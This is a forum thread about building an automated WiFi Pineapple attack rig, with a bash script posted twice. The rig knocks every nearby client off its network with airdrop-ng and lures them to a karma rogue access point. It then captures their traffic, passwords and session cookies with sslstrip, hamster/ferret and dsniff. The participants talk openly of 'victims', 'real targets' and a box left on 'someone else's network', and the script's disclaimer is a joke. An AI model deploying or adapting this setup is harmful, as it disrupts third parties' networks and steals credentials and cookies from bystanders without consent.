diggler Posted December 14, 2011 Share Posted December 14, 2011 (edited) 1. Is it true that we can use the airdrop-ng tool to deauth at the same time, on the same wireless adapter, that we are sharing internet from (ex. wlan0/mon0)? 2. Depending on the answer either A or B will be the better hardware setup. A - laptop with BTR1 physically installed on entire disk - connect to internet with wlan0 (built in laptop wireless adapter) - deauth with wlan1 (USB wireless adapter -- ALFA) - connect to AP51 MK3 with eth0 (built in laptop wired adapter) or B - laptop with BTR1 physically installed on entire disk - connect to internet with wlan0 (built in laptop wireless adapter) - deauth with wlan0 (at the same time with same wireless adapter) - connect to AP51 MK3 with eth0 (built in laptop wired adapter) 3. I'd like to combine a number of scripts to function with this type of hardware / software setup. What I'm thinking is: -first get internet going on the laptop (wicd or command based) -run master script (wp3 on steroids) -have all tools, besides karma, run off of BT5R1 (why? because of hardware storage/power/dependency restrictions/limitations) -mk3 pineapple WEBGUI still very handy for watching connection / association / dhcp logs etc -get the wp3.sh script to autostart karma -in new steroid script setup: xterm used for window control ferret and hamster for sidejacking sslstrip for https dsniff for all other username/passwords (or ettercap) urlsnarf to monitor visited urls driftnet for fun firefox needs to be configured with a proxy of 127.0.0.1:1234 url for hamster server is http://hamster -tell these tools in a new script to log in a new folder on the desktop (or wherever) to make it easier to find all the new data instead of having to browse diff DIRs per tool 4. I like the functionality these scripts offer, but they'll need some modification -http://www.backtrack-linux.org/forums/backtrack-5-experts-section/45123-another-script-sidejacking-%5Bsidejackssl-sh%5D.html -http://teh-geek.com/?p=565 -itsm0ld's script -obviously add as much to this to wp3.sh in the right order of operations 5. Goal being, connect all HW, turn-on laptop, get an internet connection, run one script (or two), follow prompts and start watching the goodness. 6. What seems messy in all these scripts is the different IPTABLE rules for each one. I think the only rule that would need to be added to wp3.sh is the SSLSTRIP one -iptables -t nat -A OUTPUT -p tcp --dport 80 -j DNAT --to-destination 127.0.0.1:8080 7. have a terminal pop-up so you can launch airdrop-ng deauth when ready -autolaunch terminal with Darren's airdrop-ng script for mass deauth except us (but make sure we still have to hit enter, incase we dont want or need to do this off the bat) touch deauth.conf nano deauth.conf a/00:00:00:00:00:00|any <-- mac of our AP51 AP d/any|any airdrop-ng -i mon0 -t cap-01.csv -r deauth.conf 8. assume that if the script was written now that BT5R1 had just had a apt-get update; apt-get upgrade -y done on it. updates sslstrip to .9 latest and all the tools to what we need i believe Edited December 14, 2011 by diggler Quote Link to comment Share on other sites More sharing options...
Mr-Protocol Posted December 14, 2011 Share Posted December 14, 2011 1) pretty sure no 2) A 3) A bit overkill, I only load the tools I need at that time. 4) Add it, modify it, it's open source; I can almost guarantee you will run into issues though. 5) Cool 6) So modify it if you want it there. I might want to suggest man iptables 7) Easy enough to do inside a script, google if you don't know how. 8) Don't get what you are saying on this one. But I have a script to update BT5 and Metasploit and S.E.T. I made. Quote Link to comment Share on other sites More sharing options...
diggler Posted December 14, 2011 Author Share Posted December 14, 2011 (edited) 1. Why is there a deauth tool on the pineapple WEBGUI then? because people are connecting through it sharing internet access but we have the ability to deauth at the same time through it... 3. Agreed : / got a little carried away there... I would really like SSLTRIP/DNSIFF/FERRET+HAMSTER to run off the bat (with airdrop-ng deauth option quickly accessible). Someone's already expressed some interest to help, so I'll post what is created in time. 1) pretty sure no 2) A 3) A bit overkill, I only load the tools I need at that time. 4) Add it, modify it, it's open source; I can almost guarantee you will run into issues though. 5) Cool 6) So modify it if you want it there. I might want to suggest man iptables 7) Easy enough to do inside a script, google if you don't know how. 8) Don't get what you are saying on this one. But I have a script to update BT5 and Metasploit and S.E.T. I made. Edited December 14, 2011 by diggler Quote Link to comment Share on other sites More sharing options...
Mr-Protocol Posted December 14, 2011 Share Posted December 14, 2011 I dont understand the need for side-jacking if you are using SSL Strip and can see Unames and Pwords. Quote Link to comment Share on other sites More sharing options...
diggler Posted December 14, 2011 Author Share Posted December 14, 2011 (edited) Most people don't login to FB, GMAIL, ETC... their cookies do it for them. The chance that you catch someone logging in is lower, than scraping cookies while their browsing, especially in a deauth scenario I dont understand the need for side-jacking if you are using SSL Strip and can see Unames and Pwords. Edited December 14, 2011 by diggler Quote Link to comment Share on other sites More sharing options...
Mr-Protocol Posted December 14, 2011 Share Posted December 14, 2011 Most users probably have saved passwords in browser. And it's not like you need instant access to their facebook via cookie anyways. Quote Link to comment Share on other sites More sharing options...
telot Posted December 15, 2011 Share Posted December 15, 2011 This is right up my alley. I too want the "deauth everything around me then karma everyone to me and allow for remote gui/terminal access by me" process via scripting - but I wat it done automatically at boot up. What I'm looking for the perfect Svartkast/dropbox (see http://www.irongeek.com/i.php?page=videos/derbycon1/adrian-crenshaw-building-a-svartkast-cheap-hardware-to-leave-behind-on-someone-elses-network for terminology and the basic premise). My noob brain encounters this problem: If you iwconfig a stock pineapple, you'll see mon.wlan0 - this is locked on channel 11 by default, thereby removing your ability to deauth people on any channel but 11 without bringing down this interface (airmon-ng stop mon.wlan0). So if you want to do the whole "deauth everyone around me", at bootup you'd have to either stop mon.wlan0 (no idea what this actually does/haven't figured it out yet) everytime, or somehow prevent it from starting at bootup, then start airmon-ng on wlan0, do an airodump-ng that pipes all the BSSIDs and channels in range into your startup script, then airmon-ng stop mon0, restart it on those channels and deauth the BSSIDs one channel/bssid at a time. After everyones deauth'd, you then bring mon.wlan0 back up (assuming Jasagar somehow needs it) and startup karma. Then begin tcpdump/wireshark capturing for later consumption via scp. I plan to accomplish this with a Raspberrypi (raspberrypi.org) but need to first confront the major issue of - by the time it deauths any and all AP's around it, won't people have rejoined their network? The deauth tests I've run against my crappy netgear router work only if I deauth with an external (not on pineapple) monitor mode enabled wifi adapter. When I deauth with the pineapple, it takes too long for the pineapple to get mon.wlan0 back up and running - my test laptop has already reconnected to my crap netgear. More tests with different routers need to be done for my results to be conclusive, and I need to find out what mon.wlan0 is all about...but the idea of a small box I can drop anywhere that houses a credit card sized computer and a pineapple that in total costs $70 is too amazing to pass up. Quote Link to comment Share on other sites More sharing options...
diggler Posted December 15, 2011 Author Share Posted December 15, 2011 I apologize in advance, this wll be a short reply because im on my phone. If you invest in a different hardware setup, where you have two wireless adapters (ex wan0 and wlan1) and 1 ethernet adapter you can use one to connect to to internet, one to run pineapple and karma and the spare wlan1 to issue deauths. This is right up my alley. I too want the "deauth everything around me then karma everyone to me and allow for remote gui/terminal access by me" process via scripting - but I wat it done automatically at boot up. What I'm looking for the perfect Svartkast/dropbox (see http://www.irongeek....e-elses-network for terminology and the basic premise). My noob brain encounters this problem: If you iwconfig a stock pineapple, you'll see mon.wlan0 - this is locked on channel 11 by default, thereby removing your ability to deauth people on any channel but 11 without bringing down this interface (airmon-ng stop mon.wlan0). So if you want to do the whole "deauth everyone around me", at bootup you'd have to either stop mon.wlan0 (no idea what this actually does/haven't figured it out yet) everytime, or somehow prevent it from starting at bootup, then start airmon-ng on wlan0, do an airodump-ng that pipes all the BSSIDs and channels in range into your startup script, then airmon-ng stop mon0, restart it on those channels and deauth the BSSIDs one channel/bssid at a time. After everyones deauth'd, you then bring mon.wlan0 back up (assuming Jasagar somehow needs it) and startup karma. Then begin tcpdump/wireshark capturing for later consumption via scp. I plan to accomplish this with a Raspberrypi (raspberrypi.org) but need to first confront the major issue of - by the time it deauths any and all AP's around it, won't people have rejoined their network? The deauth tests I've run against my crappy netgear router work only if I deauth with an external (not on pineapple) monitor mode enabled wifi adapter. When I deauth with the pineapple, it takes too long for the pineapple to get mon.wlan0 back up and running - my test laptop has already reconnected to my crap netgear. More tests with different routers need to be done for my results to be conclusive, and I need to find out what mon.wlan0 is all about...but the idea of a small box I can drop anywhere that houses a credit card sized computer and a pineapple that in total costs $70 is too amazing to pass up. Quote Link to comment Share on other sites More sharing options...
Sebkinne Posted December 15, 2011 Share Posted December 15, 2011 I am unsure whether is has been mentioned, but the pineapple can deauth clients for you. It can do so even when running karma. However, deauth is not working correctly through the pineapple interface, a fix has already been done and will be in the next firmware. Best, Sebkinne Quote Link to comment Share on other sites More sharing options...
diggler Posted December 15, 2011 Author Share Posted December 15, 2011 (edited) I didnt know that, but it makes a big difference in how I'm thinking of setting up my system. Can you explain why that's possible on the wireless interface of the pineapple and not the ALFA USB interface. Also, what tool is issuing the deauth? Is it possible to use the airdrop-ng command that I've referenced in the first post of this thread? Manny thanks Seb... Cheers... I am unsure whether is has been mentioned, but the pineapple can deauth clients for you. It can do so even when running karma. However, deauth is not working correctly through the pineapple interface, a fix has already been done and will be in the next firmware. Best, Sebkinne Edited December 15, 2011 by diggler Quote Link to comment Share on other sites More sharing options...
wcs Posted December 15, 2011 Share Posted December 15, 2011 Also, what tool is issuing the deauth? Is it possible to use the airdrop-ng command that I've referenced in the first post of this thread? I think most people (well I am and the pineapple but he's broken right now) using aireplay-ng If you haven't seen this thread, check it out! http://www.rx8club.com/showthread.php?t=180037 Seriously, its interesting, grab a coke or a beer, something. Quote Link to comment Share on other sites More sharing options...
diggler Posted December 15, 2011 Author Share Posted December 15, 2011 Is it possible to get airdrop-ng on the pineapple as well then? Otherwise, I would need the original HW setup in the first post of this thread (A), and airdrop-ng off the ALFA USB. I think most people (well I am and the pineapple but he's broken right now) using aireplay-ng If you haven't seen this thread, check it out! http://www.rx8club.c...ad.php?t=180037 Seriously, its interesting, grab a coke or a beer, something. Quote Link to comment Share on other sites More sharing options...
telot Posted December 15, 2011 Share Posted December 15, 2011 Is it possible to get airdrop-ng on the pineapple as well then? Otherwise, I would need the original HW setup in the first post of this thread (A), and airdrop-ng off the ALFA USB. Heres the deal as I understand it Diggler - at current time, you can't deauth as you want to using the Pineapple. The *best* way to do it with current firmware is to have an alfa usb attached to your computer to do the deauths in addition to the pineapple running that will then offer up karma'd AP's to the kicked off victims. However, this all could change with Seb's mysterious new firmware - Seb, do you have an ETA on delivery of your new firmware? You rock man, can't wait to see what you have in store for us...maybe a little preview/changelog? :) Hope this helps telot Quote Link to comment Share on other sites More sharing options...
d1000 Posted January 27, 2013 Share Posted January 27, 2013 Hi! Any news on this thread? Also looking for a setup that can make my raspberry a poweron deauth everyone near my pineapple. Anyone has this working? Power it on and voilaááááá! Quote Link to comment Share on other sites More sharing options...
telot Posted January 27, 2013 Share Posted January 27, 2013 (edited) Heres a script I made way back in 2011. It was meant to be used with the mark3, but I don't think anything has changed. This script makes some assumptions about your setup that you should verify/modify - its all mentioned in the first blahb of commented text. Hope it helps #!/bin/sh #telot presents....:::drum roll::: #One wicked ass nasty script that automates the ICS for the pineapple, begins packet capturing, and deauths every access point/client nearby! Enjoy! #Note that this script makes quite a few assumptions. They are: #You are using backtrack5R1. #Your interface that is connecting to the internet is wlan0 #Your interface that is connecting to the pineapple is eth0 #You have a alfa realtek usb card capable of monitor mode plugged in. #You have airdrop-ng installed and configured. This is a bit of a pita. If you don't want the deauth functions, comment it out (its at the very bottom of this script). #You have not run wp3.sh or any other network configuration stuff. #You have your pineapple configured to autostart karma at bootup. #This script is meant to run on your laptop upon bootup. # #Also in this script, I'm using my smartphone's wifi hotspot feature, and that is why I'm using wpa_supplicant. #So the internet I'm serving up in my pentest lab is actually run through my cellphone. #So if you're dumb enough to do this in public to real people, use the local wifi. You don't want "real" targets eating up your monthly cellphone bandwidth. # # #Disclaimer: Herp a derp don't use this in public. Don't use this on anyone but your wife. Don't invade other peoples privacy. Don't be an asshole. With great power comes great...blah blah blah # # #I'm keeping most configuration and capture files on the desktop for ease. cd /root/Desktop/ #Again, I'm using wpa because I'm running this through my cellphones hotspot. Remove the wpa_supplicant line and replace it with the below commented line. #iwconfig wlan0 essid EssidOfAPyouWantToUse wpa_supplicant -B Dwext -i wlan0 -c Jack.conf dhclient wlan0 #Now I just copy pasta'd most of this from the wp3.sh - I use all defaults for my setup, if you do not, change as necessary. #Bring up Ethernet Interface directly connected to Pineapple ifconfig eth0 172.16.42.42 netmask 255.255.255.0 up # Enable IP Forwarding echo '1' > /proc/sys/net/ipv4/ip_forward echo -n "IP Forwarding enabled. /proc/sys/net/ipv4/ip_forward set to " cat /proc/sys/net/ipv4/ip_forward #clear chains and rules iptables -X iptables -F echo iptables chains and rules cleared #setup IP forwarding iptables -A FORWARD -i wlan0 -o wlan0 -s 172.16.42.0/24 -m state --state NEW -j ACCEPT iptables -A FORWARD -m state --state ESTABLISHED,RELATED -j ACCEPT iptables -A POSTROUTING -t nat -j MASQUERADE echo IP Forwarding Enabled #remove default route route del default echo Default route removed #add default gateway route add default gw 192.168.1.1 wlan0 echo Pineapple Default Gateway Configured #instructions #echo All set. Now on the Pineapple issue: route add default gw $pineapplehostip br-lan ping -c3 172.16.42.1 if [ $? -eq 0 ]; then echo "ICS configuration successful." #echo "Issuing on Pineapple: route add default gw $pineapplehostip br-lan" #echo " ssh root@$pineappleip 'route add default gw '$pineapplehostip' br-lan'" #echo "Enter Pineapple password if prompted" #ssh root@$pineappleip 'route add default gw '$pineapplehostip' br-lan' fi echo "" echo "Browse to http://172.16.42.1/pineapple -- Happy Hacking!" echo "" #Now on to the fun stuff! # # # #Now we autostart wireshark and begin capturing the pineapple traffic. I use screen -d -m to hide the console, as for some reason my wireshark is bugged out and hangs a bit. #Remember to screen -r back to it and get rid of it when you're done. screen -d -m wireshark -i eth0 -k -w sharkcap & #This next section requires an additional wifi card that supports monitor mode. I have a usb alfa realtek one (similar to those found in the hakshop). #This is also created in a detached screen. So remember to cleanup when you're done! # # #Now we deauth every access point around us. Make sure to set a conf file (in my case, I call if yourescrewed.conf) for airdrop with your allows and denys. #I set mine to allow the pineapple & my hotspot and deny everyone else. ifconfig wlan1 up airmon-ng start wlan1 cd /pentest/wireless/airdrop-ng/ screen -d -m airodump-ng mon0 -w capfile --output-format csv sleep 20 python airdrop-ng -i mon0 -t capfile-01.csv -r yourescrewed.conf telot Edited January 27, 2013 by telot Quote Link to comment Share on other sites More sharing options...
d1000 Posted January 29, 2013 Share Posted January 29, 2013 Heres a script I made way back in 2011. It was meant to be used with the mark3, but I don't think anything has changed. This script makes some assumptions about your setup that you should verify/modify - its all mentioned in the first blahb of commented text. Hope it helps #!/bin/sh #telot presents....:::drum roll::: #One wicked ass nasty script that automates the ICS for the pineapple, begins packet capturing, and deauths every access point/client nearby! Enjoy! #Note that this script makes quite a few assumptions. They are: #You are using backtrack5R1. #Your interface that is connecting to the internet is wlan0 #Your interface that is connecting to the pineapple is eth0 #You have a alfa realtek usb card capable of monitor mode plugged in. #You have airdrop-ng installed and configured. This is a bit of a pita. If you don't want the deauth functions, comment it out (its at the very bottom of this script). #You have not run wp3.sh or any other network configuration stuff. #You have your pineapple configured to autostart karma at bootup. #This script is meant to run on your laptop upon bootup. # #Also in this script, I'm using my smartphone's wifi hotspot feature, and that is why I'm using wpa_supplicant. #So the internet I'm serving up in my pentest lab is actually run through my cellphone. #So if you're dumb enough to do this in public to real people, use the local wifi. You don't want "real" targets eating up your monthly cellphone bandwidth. # # #Disclaimer: Herp a derp don't use this in public. Don't use this on anyone but your wife. Don't invade other peoples privacy. Don't be an asshole. With great power comes great...blah blah blah # # #I'm keeping most configuration and capture files on the desktop for ease. cd /root/Desktop/ #Again, I'm using wpa because I'm running this through my cellphones hotspot. Remove the wpa_supplicant line and replace it with the below commented line. #iwconfig wlan0 essid EssidOfAPyouWantToUse wpa_supplicant -B Dwext -i wlan0 -c Jack.conf dhclient wlan0 #Now I just copy pasta'd most of this from the wp3.sh - I use all defaults for my setup, if you do not, change as necessary. #Bring up Ethernet Interface directly connected to Pineapple ifconfig eth0 172.16.42.42 netmask 255.255.255.0 up # Enable IP Forwarding echo '1' > /proc/sys/net/ipv4/ip_forward echo -n "IP Forwarding enabled. /proc/sys/net/ipv4/ip_forward set to " cat /proc/sys/net/ipv4/ip_forward #clear chains and rules iptables -X iptables -F echo iptables chains and rules cleared #setup IP forwarding iptables -A FORWARD -i wlan0 -o wlan0 -s 172.16.42.0/24 -m state --state NEW -j ACCEPT iptables -A FORWARD -m state --state ESTABLISHED,RELATED -j ACCEPT iptables -A POSTROUTING -t nat -j MASQUERADE echo IP Forwarding Enabled #remove default route route del default echo Default route removed #add default gateway route add default gw 192.168.1.1 wlan0 echo Pineapple Default Gateway Configured #instructions #echo All set. Now on the Pineapple issue: route add default gw $pineapplehostip br-lan ping -c3 172.16.42.1 if [ $? -eq 0 ]; then echo "ICS configuration successful." #echo "Issuing on Pineapple: route add default gw $pineapplehostip br-lan" #echo " ssh root@$pineappleip 'route add default gw '$pineapplehostip' br-lan'" #echo "Enter Pineapple password if prompted" #ssh root@$pineappleip 'route add default gw '$pineapplehostip' br-lan' fi echo "" echo "Browse to http://172.16.42.1/pineapple -- Happy Hacking!" echo "" #Now on to the fun stuff! # # # #Now we autostart wireshark and begin capturing the pineapple traffic. I use screen -d -m to hide the console, as for some reason my wireshark is bugged out and hangs a bit. #Remember to screen -r back to it and get rid of it when you're done. screen -d -m wireshark -i eth0 -k -w sharkcap & #This next section requires an additional wifi card that supports monitor mode. I have a usb alfa realtek one (similar to those found in the hakshop). #This is also created in a detached screen. So remember to cleanup when you're done! # # #Now we deauth every access point around us. Make sure to set a conf file (in my case, I call if yourescrewed.conf) for airdrop with your allows and denys. #I set mine to allow the pineapple & my hotspot and deny everyone else. ifconfig wlan1 up airmon-ng start wlan1 cd /pentest/wireless/airdrop-ng/ screen -d -m airodump-ng mon0 -w capfile --output-format csv sleep 20 python airdrop-ng -i mon0 -t capfile-01.csv -r yourescrewed.conf telot Many thanks! Quote Link to comment Share on other sites More sharing options...
telot Posted January 29, 2013 Share Posted January 29, 2013 Ooo! I have the best answer? Mr. P, where do I find the reward pastries? ;) Glad I could help telot Quote Link to comment Share on other sites More sharing options...
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.